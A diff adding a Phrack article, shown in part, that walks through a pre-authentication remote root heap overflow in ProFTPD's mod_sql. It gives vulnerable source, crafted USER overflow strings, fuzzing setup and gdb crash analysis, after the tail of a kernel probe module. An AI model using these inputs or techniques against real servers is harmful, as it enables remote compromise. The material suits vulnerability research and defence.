+	if (register_kretprobe(&mmap_kretprobe) < 0)
+		goto kfail;
+	
+	return 0;
+
+	jfail:
+		
+		printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
+	kfail:
+		printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));
+
+	return -1;
+}
+
+	
+module_exit(exit_module);
+
+----EOF----
diff --git a/phrack67/7.txt b/phrack67/7.txt
new file mode 100644
index 0000000..8916ca0
--- /dev/null
+++ b/phrack67/7.txt
@@ -0,0 +1,2628 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x07 of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=------=[ ProFTPD with mod_sql pre-authentication, remote root  ]=------=|
+|=-------------------------=[ heap overflow ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ max_packetz@felinemenace.org ]=------------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Contents
+
+  1 - Introduction 
+
+  2 - The vulnerability
+   2.1 - Tags explained
+   2.2 - Generating overflow strings
+
+  3 - Exploring what we can control
+   3.1 - Automating tasks
+   3.2 - ProFTPD Pool allocator
+   3.3 - Examining backtraces
+    3.3.1 - 11380f2c8ce44d29b93b9bc6308692ae backtrace
+    3.3.2 - 2813d637d735be610a460a75db061f6b backtrace
+    3.3.3 - 3d10e2a054d8124ab4de5b588c592830 backtrace
+    3.3.4 - 844319188798d7742af43d10f6541a61 backtrace 
+    3.3.5 - 914b175392625fe75c2b16dc18bfb250 backtrace
+    3.3.6 - b975726b4537662f3f5ddf377ea26c20 backtrace
+    3.3.7 - ccbbd918ad0dbc7a869184dc2eb9cc50 backtrace
+    3.3.8 - f1bfd5428c97b9d68a4beb6fb8286b70 backtrace
+    3.3.9 - Summary
+   3.4 - Exploitation avenues
+    3.4.1 - Shellcode approach
+    3.4.2 - Data manipulation
+
+  4 - Writing an exploit
+   4.1 - Exploitation via arbitrary pointer return
+   4.2 - Cleanup structure crash
+   4.3 - Potential enhancements
+   4.4 - Last thoughts
+
+  5 - Discussion of hardening techniques against exploitation
+   5.1 - Address Space Layout Randomisation
+   5.2 - Non-executable Memory
+   5.3 - Position Independent Binaries
+   5.4 - Stack Protector
+   5.5 - RelRO
+
+  6 - References
+
+--[ 1 - Introduction 
+
+This paper describes and explores a pre-authentication remote root heap
+overflow in the ProFTPD [1] FTP server. It's not quite a standard overflow,
+due to the how the ProFTPD heap works, and how the bug is exploited via 
+variable substition.
+
+The vulnerability was inadvertently mitigated (from remote root, at least 
+:( ) when the ProFTPD developers fixed a separate vulnerability in mod_sql 
+where you could inject SQL and bypass authentication. That vulnerability 
+that mitigated it is documented in CVE-2009-0542. 
+
+The specific vulnerability we are exploring is an unbounded copy operation 
+in sql_prepare_where(), which has not been fixed yet.
+
+Also, I'd like to preemptively apologise for the attached code. It evolved 
+over time in piecemeal fashion, and isn't overly pretty/readable by now :p
+
+--[ 2 - The vulnerability
+
+The vulnerability itself is a little contrived, but bare with me:
+
+In contrib/mod_sql.c, _sql_getpasswd(), we have the following code (line 
+numbers from ProFTPD 1.3.2rc2):
+
+---
+1132   if (!cmap.usercustom) {
+1133     where = sql_prepare_where(0, cmd, 2, usrwhere, cmap.userwhere, 
+                                   NULL);
+1134
+1135     mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 5, "default",
+1136       cmap.usrtable, cmap.usrfields, where, "1"), "sql_select");
+1137
+---
+
+Where usrwhere is in the form of:
+
+(<table name for user column> = 'USERNAME')
+
+Inside of sql_prepare_where() is where all the fun takes place:
+
+---
+770 static char *sql_prepare_where(int flags, cmd_rec *cmd, int cnt, ...) {
+771   int i, flag, nclauses = 0;
+772   int curr_avail;
+773   char *buf = "", *res;
+774   va_list dummy;
+775
+776   res = pcalloc(cmd->tmp_pool, SQL_MAX_STMT_LEN);                   [1]
+777
+778   flag = 0;
+779   va_start(dummy, cnt);
+780   for (i = 0; i < cnt; i++) {
+781     char *clause = va_arg(dummy, char *);
+782     if (clause != NULL &&
+783         *clause != '\0') {
+784       nclauses++;
+785
+786       if (flag++)
+787         buf = pstrcat(cmd->tmp_pool, buf, " AND ", NULL);
+788       buf = pstrcat(cmd->tmp_pool, buf, "(", clause, ")", NULL);
+789     }
+790   }
+791   va_end(dummy);
+792
+793   if (nclauses == 0)
+794     return NULL;
+795
+796   if (!(flags & SQL_PREPARE_WHERE_FL_NO_TAGS)) {                    [2]
+797     char *curr, *tmp;
+798
+799     /* Process variables in WHERE clauses, except any "%{num}" 
+    references. */
+800     curr = res;
+801     curr_avail = SQL_MAX_STMT_LEN;
+802
+803     for (tmp = buf; *tmp; ) {
+804       char *str;
+805       modret_t *mr;
+806
+807       if (*tmp == '%') {
+808         char *tag = NULL;
+809
+810         if (*(++tmp) == '{') {
+811           char *query;
+812
+813           if (*tmp != '\0')
+814             query = ++tmp;
+815
+816           while (*tmp && *tmp != '}')
+817             tmp++;
+818
+819           tag = pstrndup(cmd->tmp_pool, query, (tmp - query));        
+820           if (tag) {
+821             str = resolve_long_tag(cmd, tag);                       [3]
+822             if (!str)
+823               str = pstrdup(cmd->tmp_pool, "");
+824
+825             mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 2, 
+           "default",
+826               str), "sql_escapestring");
+827             if (check_response(mr) < 0)
+828               return NULL;
+829
+830             sstrcat(curr, mr->data, curr_avail);
+831             curr += strlen(mr->data);
+832             curr_avail -= strlen(mr->data);
+833
+834             if (*tmp != '\0')
+835               tmp++;
+836
+837           } else {
+838             return NULL;
+839           }
+840
+841         } else {
+842           str = resolve_short_tag(cmd, *tmp);                       [4]
+843           mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 2,"default",
+844             str), "sql_escapestring");
+845           if (check_response(mr) < 0)
+846             return NULL;
+847
+848           sstrcat(curr, mr->data, curr_avail);
+849           curr += strlen(mr->data);
+850           curr_avail -= strlen(mr->data);
+851
+852           if (*tmp != '\0')
+853             tmp++;
+854         }
+855
+856       } else {                                                      [5]
+857         *curr++ = *tmp++;
+858         curr_avail--;
+859       }
+860     }
+861     *curr++ = '\0';
+862
+863   } else {
+864     res = buf;
+865   }
+866
+867   return res;
+868 }
+869
+---
+
+At [1], memory is allocated. SQL_MAX_STMT_LEN is defined as 4096 bytes. 
+That should be plenty for <300 bytes, right?
+
+At [2], flags are checked to see if "tags" should be expanded. In the case 
+we are interested in, tags are expanded.
+
+At [3], we see that "long tags" are expandable, and that they are 
+surrounded by %{ and finished with }. We'll ignore them for now. They take 
+up too much input space in regards to the output length.
+
+At [4], we see that they have concepts of "short" tags, consisting of one 
+byte.
+
+At [5], we see that they have an unbounded one byte copy operation, inside 
+of a suitable loop.
+
+Now, we need to cover tags to see what we can do with it:
+
+------[ 2.1 Tags explained
+
+For the path we're interested in, we'll cover "short" tags (longer tags are
+not all interesting, and for reasons explained later on).
+
+Looking at resolve_short_tag(), we see the following (heavily snipped for 
+brevity):
+
+---
+1719 static char *resolve_short_tag(cmd_rec *cmd, char tag) {
+1720   char arg[256] = {'\0'}, *argp;
+1721
+1722   switch (tag) {
+1723   case 'A': {
+1724       char *pass;
+1725
+1726       argp = arg;
+1727       pass = get_param_ptr(main_server->conf, C_PASS, FALSE);
+1728       if (!pass)
+1729         pass = "UNKNOWN";
+1730
+1731       sstrncpy(argp, pass, sizeof(arg));
+1732     }
+1733     break;
+1734
+1735   case 'a':
+1736     argp = arg;
+1737     sstrncpy(argp, 
+           pr_netaddr_get_ipstr(pr_netaddr_get_sess_remote_addr()),
+1738       sizeof(arg));
+1739     break;
+1740
+...
+1914   case 'm':
+1915     argp = arg;
+1916     sstrncpy(argp, cmd->argv[0], sizeof(arg));
+1917     break;
+1918
+...
+1929   case 'r':
+1930     argp = arg;
+1931     if (strcmp(cmd->argv[0], C_PASS) == 0 &&
+1932         session.hide_password)
+1933       sstrncpy(argp, C_PASS " (hidden)", sizeof(arg));
+1934
+1935     else
+1936       sstrncpy(argp, get_full_cmd(cmd), sizeof(arg));
+1937     break;
+1938
+...
+1954   case 'T':
+1955     argp = arg;
+1956     if (session.xfer.p) {
+...
+1974     } else
+1975       sstrncpy(argp, "0.0", sizeof(arg));
+1976
+1977     break;
+...
+2021
+2022   default:
+2023     argp = "{UNKNOWN TAG}";
+2024     break;
+2025   }
+2026
+2027   return pstrdup(cmd->tmp_pool, argp);
+2028 }
+2029
+---
+
+So, as you can see, tags are a form of variable substitution. %m and %r 
+allow us to "duplicate" our input, %a allows us to copy our IP address, %T 
+gives us 0.0 (since we're not transferring anything at the moment, and %Z 
+(handled by the default case) gives us "{UNKNOWN TAG}".
+
+By combining these, we can generate strings that expand past the allocated 
+size in sql_prepare_where, due to the unbounded copy.
+
+Firstly, we'll look at what those inputs would generate, then we'll look at
+how to generate suitable overflow strings.
+
+Firstly, the string "AAA%m" once processed would come out looking like:
+
+AAAAAA%m
+
+The string "AAA%m%m" would look like:
+
+AAAAAA%mAAA%m
+
+Unfortunately the string to be expanded isn't as clean as that, it's:
+
+(<name of user entry in table> = 'USER INPUT')\x00
+
+The default of the table field is "userid". Due to the ')\x00 at the end, 
+we can't do arbitrary off-by-1 or 2 overwrites. It's possible that \x00 or
+\x29 could be useful, in some situations however.
+
+Enough chars / %m's etc would expand past 4096 bytes, and start overwriting
+other information stored on the heap. Tags enable exploitation of this 
+issue via it's input duplication. They also have a significant effect on 
+the heap, for better or worse.
+
+(As a side note, contrib/mod_rewrite.c has %m tag support as well. Since it
+seems a little unlikely to hit that pre-auth, it wasn't investigated 
+further..)
+
+------[ 2.2 Generating overflow strings
+
+One initial complication we had in exploring this vulnerability further was
+due to making an overflow string that once processed would expand to a 
+suitable size. (As an example, overflow our own arbitrary content 32 bytes 
+past 4096).
+
+We solved this problem with using a constraint solver to generate the 
+appropriate strings for us, thus solving an otherwise annoying situation 
+(it being a little messy to calculate how much we need, since touching one 
+thing can dramatically throw off the rest of the calculations, as an 
+example, removing one A character would reduce it by one + 
+(one * amount_of_%m_tags)).
+
+In exploring the vulnerability, we used python-constraint [2].
+
+We used several constraints:
+
+  - Input string must be less than 256 bytes.
+  - The parsed string must overflow by exactly X+2 (due to ') added to
+    the end bytes.
+  - One/two others that I've forgotten about as I write this up.
+
+We split the strings into "fakeauth" strings, and "trigger" strings. The
+fakeauth strings are designed to consume/allocate a certain amount of 
+memory, and the trigger strings are designed to overwrite a bunch of bytes 
+after the allocation.
+
+Fakeauth strings seem to be required for maximum control of the remote 
+process, but it's possible it's not required at all.
+
+By mixing the %m's / %a's / %Z's up, it is possible to change memory 
+allocation / deallocation order, and thus explore/affect where it crashes.
+
+While the %a tags are useful in experimenting, they are not ideal, as you 
+then need to take your local IP address into account when exploiting remote
+hosts. 
+
+--[ 3 - Exploring what we can control
+
+------[ 3.1 - Automating tasks
+
+I'm a big fan of automating as much stuff as possible. In order to get a 
+ten thousand foot view of what I can do, I used python-ptrace [3] and
+pyevolve [4] to:
+
+  - Generate input strings
+  - Debug proftpd and record before/after overwriting the memory allocated 
+    in sql_prepare_where
+  - Analyze how "interesting" the results of input strings where.
+    - Process exited? Completely uninteresting. 
+    - SEGV'd? 
+      - Gather backtraces / register contents / see if the program crashed 
+        with our directly controllable user input / etc.
+
+Pyevolve, for the most part, was useful for mutating the input strings to 
+explore the code paths leading to crashes..
+
+By doing these tasks, I was able to find the more interesting paths that 
+could easily be hit, while I was flicking over the ProFTPD pool allocator
+... 
+
+------[ 3.2 - ProFTPD Pool allocator
+
+A high level overview for the ProFTPD pool allocator (src/pool.c) is given 
+at [5], but here are the quick nuts and bolts of it:
+
+- Pools are allocated, and is subdivided into blocks.
+
+- Pools have cleanup handlers (very useful - used in proftpd-not-pro-enough
+  [6] exploit by solar to gain code execution).
+
+- More blocks are malloc()'d if the pool is out of space.
+
+- Memory is never free()'d unless developer mode is enabled, and that's
+  only at daemon shut down. 
+
+- In order to allocate memory, the single linked list of free blocks is
+  checked to see if the allocation request can be satisfied first without 
+  calling malloc().
+
+The pool structure is defined as:
+
+---
+196 struct pool {
+197   union block_hdr *first;
+198   union block_hdr *last;
+199   struct cleanup *cleanups;
+200   struct pool *sub_pools;
+201   struct pool *sub_next;
+202   struct pool *sub_prev;
+203   struct pool *parent;
+204   char *free_first_avail;
+205   const char *tag;
+206 };
+---
+
+The cleanup structure looks like:
+
+---
+655 typedef struct cleanup {
+656   void *data;
+657   void (*plain_cleanup_cb)(void *);
+658   void (*child_cleanup_cb)(void *);
+659   struct cleanup *next;
+660 } cleanup_t;
+---
+
+Overwriting a cleanup structure, or a pool structure, would allow us to
+arbitrarily execute code when the pool is cleared/destroyed.
+
+The block structure is defined as:
+
+---
+46 union block_hdr {
+47   union align a;
+48
+49   /* Padding */
+50 #if defined(_LP64) || defined(__LP64__)
+51   char pad[32];
+52 #endif
+53
+54   /* Actual header */
+55   struct {
+56     char *endp;
+57     union block_hdr *next;
+58     char *first_avail;
+59   } h;
+60 };
+---
+
+Now, we trace pcalloc() as it's called in sql_prepare_where() (and
+numerously throughout the ProFTPD code), just to see what situations will 
+allow us to return pointers that we control. Controlling these returned 
+pointers would allow us to overwrite arbitrary memory, hopefully with 
+content that we can control.
+
+---
+481 void *pcalloc(struct pool *p, int sz) {
+482   void *res = palloc(p, sz);
+483   memset(res, '\0', sz);
+484   return res;
+485 }
+---
+
+gives us:
+
+---
+473 void *palloc(struct pool *p, int sz) {
+474   return alloc_pool(p, sz, FALSE);
+475 }
+---
+
+which in turn gives us:
+
+---
+435 static void *alloc_pool(struct pool *p, int reqsz, int exact) {
+436
+437   /* Round up requested size to an even number of aligned units */
+438   int nclicks = 1 + ((reqsz - 1) / CLICK_SZ);
+439   int sz = nclicks * CLICK_SZ;
+440
+441   /* For performance, see if space is available in the most recently
+442    * allocated block.
+443    */
+444
+445   union block_hdr *blok = p->last;
+446   char *first_avail = blok->h.first_avail;
+447   char *new_first_avail;
+448
+449   if (reqsz <= 0)
+450     return NULL;
+451
+452   new_first_avail = first_avail + sz;
+453
+454   if (new_first_avail <= blok->h.endp) {                        [1]
+455     blok->h.first_avail = new_first_avail;
+456     return (void *) first_avail;
+457   }
+458
+459   /* Need a new one that's big enough */
+460   pr_alarms_block();
+461
+462   blok = new_block(sz, exact);                                  [2]
+463   p->last->h.next = blok;
+464   p->last = blok;
+465
+466   first_avail = blok->h.first_avail;                            [3]
+467   blok->h.first_avail += sz;
+468
+469   pr_alarms_unblock();
+470   return (void *) first_avail;
+471 }
+---
+
+The check at [1] checks to see if the request can be satisfied from the 
+pool allocation itself..
+
+The call at [2] requests a "new_block" of memory. The returned pointer is 
+determined at [3], indicating that the first_avail pointer at least needs 
+to be modified.
+
+---
+151 /* Get a new block, from the free list if possible, otherwise malloc a 
+       new
+152  * one.  minsz is the requested size of the block to be allocated.
+153  * If exact is TRUE, then minsz is the exact size of the allocated 
+       block;
+154  * otherwise, the allocated size will be rounded up from minsz to the 
+       nearest
+155  * multiple of BLOCK_MINFREE.
+156  *
+157  * Important: BLOCK ALARMS BEFORE CALLING
+158  */
+159
+160 static union block_hdr *new_block(int minsz, int exact) {
+161   union block_hdr **lastptr = &block_freelist;
+162   union block_hdr *blok = block_freelist;
+163
+164   if (!exact) {
+165     minsz = 1 + ((minsz - 1) / BLOCK_MINFREE);
+166     minsz *= BLOCK_MINFREE;
+167   }
+168
+169   /* Check if we have anything of the requested size on our free list 
+         first...
+170    */
+171   while (blok) {
+172     if (minsz <= blok->h.endp - blok->h.first_avail) {
+173       *lastptr = blok->h.next;
+174       blok->h.next = NULL;
+175
+176       stat_freehit++;
+177       return blok;
+178
+179     } else {
+180       lastptr = &blok->h.next;
+181       blok = blok->h.next;
+182     }
+183   }
+184
+185   /* Nope...damn.  Have to malloc() a new one. */
+186   stat_malloc++;
+187   return malloc_block(minsz);
+188 }
+---
+
+BLOCK_MINFREE is defined to PR_TUNABLE_NEW_POOL_SIZE, which is defined to 
+512 bytes. 
+
+So, we can see that if we can get the stars to align correctly, we can gain
+code execution via:
+
+  - Pool cleanup/destruction
+  - Corrupting the first_avail pointer in a block.
+
+The second method is a little more effort, but it may not be possible to 
+hit the first.
+
+There are other avenues potentially available such as unlink() style
+corruption, or other heap content overwrites, but they were not explored in
+depth. 
+
+------[ 3.3 - Examining backtraces
+
+After leaving the proftpd input fuzzing / automated crash analysis code [7] 
+running for a while, I decided to stop it and examine some of the 
+backtraces it created, in order to see what was found, and if any indicated
+that they where able to gain direct code execution, or useful memory 
+corruption.
+
+# echo backtraces: `ls -l backtrace.* | wc -l` ; echo unique backtraces:
+  `md5su m backtrace.* | awk '{ print $1 }' | sort | uniq`
+backtraces: 4280
+unique backtraces: 11380f2c8ce44d29b93b9bc6308692ae
+2813d637d735be610a460a75db061f6b 3d10e2a054d8124ab4de5b588c592830
+844319188798d7742af43d10f6541a61 914b175392625fe75c2b16dc18bfb250
+b975726b4537662f3f5ddf377ea26c20 ccbbd918ad0dbc7a869184dc2eb9cc50
+f1bfd5428c97b9d68a4beb6fb8286b70
+
+Some of these back traces are very similiar, only real change in where they
+are called from. However, seeing that the code can be reached from multiple
+places is good; as it gives us more chances to take control of the remote
+process.
+
+Flicking through the backtraces:
+
+--------[ 3.3.1 - 11380f2c8ce44d29b93b9bc6308692ae backtrace ]
+
+# cat bt_frames.99861.0
+EIP: 0xb7b7e67a, EBP: 0xbfd0a0a8, memset
+EIP: 0x08055034, EBP: 0xbfd0a0d8, pstrcat
+EIP: 0x080c0d85, EBP: 0xbfd0a118, cmd_select
+EIP: 0x080c26f2, EBP: 0xbfd0a148, _sql_dispatch
+EIP: 0x080c4354, EBP: 0xbfd0a1f8, _sql_getpasswd
+EIP: 0x080c514d, EBP: 0xbfd0a2d8, _sql_getgroups
+EIP: 0x080ca70e, EBP: 0xbfd0a308, cmd_getgroups
+EIP: 0x080718a6, EBP: 0xbfd0a328, call_module
+EIP: 0x0807339e, EBP: 0xbfd0a358, dispatch_auth
+EIP: 0x0807481d, EBP: 0xbfd0a408, pr_auth_getgroups
+EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
+EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
+EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
+EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
+EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
+EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
+EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
+EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
+EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
+EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
+EIP: 0x08053109, EBP: 0xbfd0aea8, main
+EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
+EIP: 0x0804b841, EBP: 0x00000000, _start
+
+# cat regs.99861.0
+EAX: 0x00000000
+EBX: 0x0882d654
+ECX: 0x0000103c
+EDX: 0x00000001
+ESI: 0x080d4960
+EDI: 0x41346141
+EBP: 0xbfd0a0a8
+ESP: 0xbfd0a078
+EIP: 0xb7b7e67a
+
+So far, we can see we are memset()'ing a controllable pointer :D
+
+Looking further at _sql_getpasswd in the backtrace:
+
+(gdb) l *0x080c4354
+0x80c4354 is in _sql_getpasswd (mod_sql.c:1252).
+1247      }
+1248
+1249      if (!cmap.usercustom) {
+1250        where = sql_prepare_where(0, cmd, 2, usrwhere, cmap.userwhere, 
+                                      NULL);
+1251
+1252        mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 5, "default",
+1253          cmap.usrtable, cmap.usrfields, where, "1"), "sql_select");
+1254
+1255        if (check_response(mr) < 0)
+1256          return NULL;
+
+(gdb) l *0x080c0d85
+0x80c0d85 is in cmd_select (mod_sql_mysql.c:812).
+807       } else {
+808         query = pstrcat(cmd->tmp_pool, cmd->argv[2], " FROM ", 
+                            cmd->argv[1], NULL);
+809
+810         if (cmd->argc > 3 &&
+811             cmd->argv[3])
+812           query = pstrcat(cmd->tmp_pool, query, " WHERE ", 
+                              cmd->argv[3], NULL);
+813
+814         if (cmd->argc > 4 &&
+815             cmd->argv[4])
+816           query = pstrcat(cmd->tmp_pool, query, " LIMIT ", 
+                              cmd->argv[4], NULL);
+
+This backtrace is interesting, as it's appending contents we directly 
+control to the chunk. Playing further:
+
+# telnet 127.0.0.1 21
+Trying 127.0.0.1...
+Connected to 127.0.0.1.
+Escape character is '^]'.
+220 ProFTPD 1.3.1 Server (ProFTPD Default Installation) [127.0.0.1]
+USER A%m%m%mA%m%Z%Z%m%m%m%m%Z%mA%m%m%m%mA%m%m%m%m%m%m%m%mA%mA%m%Z%Z%mAA%m%m
+%ZA%m%m%m%ZA%m%m%m%Z%m%m%Z%m
+331 Password required for A%m%m%mA%m%Z%Z%m%m%m%m%Z%mA%m%m%m%mA%m%m%m%m%m%m%
+m%mA%mA%m%Z%Z%mAA%m%m%ZA%m%m%m%ZA%m%m%m%Z%m%m%Z%m
+USER AAAAAAAAAA%m%m%mA%m%m%mA%m%mAA%m%m%m%m%mA%m%Z%m%mA%m%mAA%mA%ZAA%m%m%m%
+m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9
+Ac0A
+
+...
+
+Program received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0xb7c7a6b0 (LWP 19840)]
+0xb7cf467a in memset () from /lib/tls/i686/cmov/libc.so.6
+(gdb) bt
+#0  0xb7cf467a in memset () from /lib/tls/i686/cmov/libc.so.6
+#1  0x08054d1a in pcalloc (p=0x98a84c4, sz=4156) at pool.c:481
+#2  0x08055034 in pstrcat (p=0x98a84c4) at pool.c:580
+#3  0x080c0d85 in cmd_select (cmd=0x98a84ec) at mod_sql_mysql.c:812
+#4  0x080c26f2 in _sql_dispatch (cmd=0x98a84ec, cmdname=0x80e4a3d 
+    "sql_select") at mod_sql.c:393
+#5  0x080c4354 in _sql_getpasswd (cmd=0x98a1ad4, p=0xbfa8368c) at 
+    mod_sql.c:1252
+#6  0x080c514d in _sql_getgroups (cmd=0x98a1ad4) at mod_sql.c:1599
+#7  0x080ca70e in cmd_getgroups (cmd=0x98a1ad4) at mod_sql.c:3612
+#8  0x080718a6 in call_module (m=0x80ee940, func=0x80ca6bd <cmd_getgroups>,
+    cmd=0x98a1ad4) at modules.c:439
+#9  0x0807339e in dispatch_auth (cmd=0x98a1ad4, match=0x80d9685 
+    "getgroups", m=0x0) at auth.c:89
+#10 0x0807481d in pr_auth_getgroups (p=0x98a1a04,
+    name=0x9852eec "AAAAAAAAAA%m%m%mA%m%m%mA%m%mAA%m%m%m%m%mA%m%Z%m%mA%m%mA
+    A%mA%ZAA%m%m%m%m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab
+    3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A", group_ids=0x80fb0bc, group_names=0x80fb0c0) 
+    at auth.c:691
+#11 0x08074a98 in auth_anonymous_group (p=0x98a1a04,
+    user=0x9852eec "AAAAAAAAAA%m%m%mA%m%m%mA%m%mAA%m%m%m%m%mA%m%Z%m%mA%m%mA
+    A%mA%ZAA%m%m%m%m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab
+    3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A") at auth.c:751
+#12 0x08074ea7 in pr_auth_get_anon_config (p=0x98a1a04, 
+    login_name=0xbfa838f8, user_name=0x0, anon_name=0x0) at auth.c:864
+#13 0x080a4b5c in auth_user (cmd=0x9852e94) at mod_auth.c:1831
+#14 0x080718a6 in call_module (m=0x80ec9e0, func=0x80a4a10 <auth_user>, 
+    cmd=0x9852e94) at modules.c:439
+#15 0x0804c651 in _dispatch (cmd=0x9852e94, cmd_type=2, validate=1, 
+    match=0x9852ee4 "USER") at main.c:424
+#16 0x0804caba in pr_cmd_dispatch (cmd=0x9852e94) at main.c:523
+#17 0x0804d4ee in cmd_loop (server=0x9853af4, c=0x988abdc) at main.c:750
+#18 0x0804ea36 in fork_server (fd=1, l=0x988a7bc, nofork=0 '\0') at 
+    main.c:1257
+#19 0x0804f1cf in daemon_loop () at main.c:1464
+#20 0x080522c6 in standalone_main () at main.c:2294
+#21 0x08053109 in main (argc=4, argv=0xbfa84374, envp=0xbfa84388) at 
+    main.c:2878
+(gdb) i r
+eax            0x0      0
+ecx            0x103c   4156
+edx            0x1      1
+ebx            0x98a2444        160048196
+esp            0xbfa834a8       0xbfa834a8
+ebp            0xbfa834d8       0xbfa834d8
+esi            0x80d4960        135088480
+edi            0x41346141       1093951809
+...
+# ruby pattern_offset.rb 0x41346141
+12
+...
+(gdb) frame 2
+#2  0x08055034 in pstrcat (p=0x98a84c4) at pool.c:580
+580       res = (char *) pcalloc(p, len + 1);
+(gdb) info locals
+argp = 0x0
+res = 0x0
+len = 4155
+dummy = 0xbfa83524 ...
+(gdb) x/32x $esp
+0xbfa834e0:     0x098a84c4      0x0000103c      0x00000000      0x00000000
+0xbfa834f0:     0x00000000      0x0988b62c      0xbfa83524      0x0000103b
+0xbfa83500:     0x00000000      0x00000000      0xbfa83548      0x080c0d85
+0xbfa83510:     0x098a84c4      0x098a854c      0x080e40e5      0x098aa7d4
+0xbfa83520:     0x00000000      0x080ef060      0x00000000      0x00000000
+0xbfa83530:     0x00000000      0x098a854c      0x00000000      0x098a8534
+0xbfa83540:     0x0988b62c      0x0988b68c      0xbfa83578      0x080c26f2
+0xbfa83550:     0x098a84ec      0x080e441a      0x098aa7d4      0x098a3874
+(gdb) x/s  0x098a854c
+0x98a854c:       "userid, passwd, uid, gid, homedir, shell FROM ftpuser"
+(gdb) x/s  0x080e40e5
+0x80e40e5:       " WHERE "
+(gdb) x/s  0x098aa7d4
+0x98aa7d4:       "(userid='", 'A' <repeats 20 times>, "%m%m%mA%m%m%mA%m%mAA
+%m%m%m%m%mA%m%Z%m%mA%m%mAA%mA%ZAA%m%m%m%m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa
+6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0", 'A' <repeats 11 times>, 
+"%m%m%mA%m%m%mA%m%mAA%m"...
+
+This crash is excellent, but it has several drawbacks:
+  - No direct control of EIP, thus requiring overwriting larger chunks of 
+    memory which may be problematic.
+  - Configuration dependent :(
+    - Both SQLUserInfo and SQLGroupInfo specify table names and table 
+      entries. For example:
+      - SQLUserInfo ftpuser userid passwd uid gid homedir shell
+      - SQLGroupInfo ftpgroup groupname gid members
+    - We could collect common configurations recommended in guides so that 
+      we can take them into account when bruteforcing.. sucky though.
+
+Let's see what the others contain before getting too excited :)
+
+------[ 3.3.2 - 2813d637d735be610a460a75db061f6b backtrace ]
+
+# cat bt_frames.16259.0
+EIP: 0x08054b7d, EBP: 0xbfd0a1d8, destroy_pool
+EIP: 0x08054b0c, EBP: 0xbfd0a1e8, clear_pool
+EIP: 0x08054bd1, EBP: 0xbfd0a1f8, destroy_pool
+EIP: 0x0807389f, EBP: 0xbfd0a248, pr_auth_getpwnam
+EIP: 0x080a0e3a, EBP: 0xbfd0a488, setup_env
+EIP: 0x080a51ca, EBP: 0xbfd0a4d8, auth_pass
+EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
+EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
+EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
+EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
+EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
+EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
+EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
+EIP: 0x08053109, EBP: 0xbfd0aea8, main
+EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
+EIP: 0x0804b841, EBP: 0x00000000, _start
+# cat regs.16259.0
+EAX: 0x62413362
+EBX: 0x0000b25d
+ECX: 0x00000002
+EDX: 0x0882f8e8
+ESI: 0x080d4960
+EDI: 0x088161e8
+EBP: 0xbfd0a1d8
+ESP: 0xbfd0a1d0
+EIP: 0x08054b7d
+
+EAX looks like a modified pointer, and we can see we're in the
+destroy_pool / clean_pool code. No arbitrary EIP yet :~(
+
+(gdb) l *0x08054b7d
+0x8054b7d is in destroy_pool (pool.c:415).
+410         return;
+411
+412       pr_alarms_block();
+413
+414       if (p->parent) {
+415         if (p->parent->sub_pools == p)
+416           p->parent->sub_pools = p->sub_next;
+417
+418         if (p->sub_prev)
+419           p->sub_prev->sub_next = p->sub_next;
+
+(gdb) l * 0x08054b0c
+0x8054b0c is in clear_pool (pool.c:395).
+390       /* Run through any cleanups. */
+391       run_cleanups(p->cleanups);
+392       p->cleanups = NULL;
+393
+394       /* Destroy subpools. */
+395       while (p->sub_pools)
+396         destroy_pool(p->sub_pools);
+397       p->sub_pools = NULL;
+398
+399       free_blocks(p->first->h.next);
+
+So, we can see that we've corrupted the p->parent->sub_pools pointer. Not 
+immediately interesting, as we've isolated what appears to be very 
+interesting earlier on. Might be able to do some fun and games at some 
+point with the old unlink() style, though.
+
+------[ 3.3.3 - 3d10e2a054d8124ab4de5b588c592830 backtrace ]
+
+# cat bt_frames.99758.0
+
+EIP: 0x08054b7d, EBP: 0xbfd0a338, destroy_pool
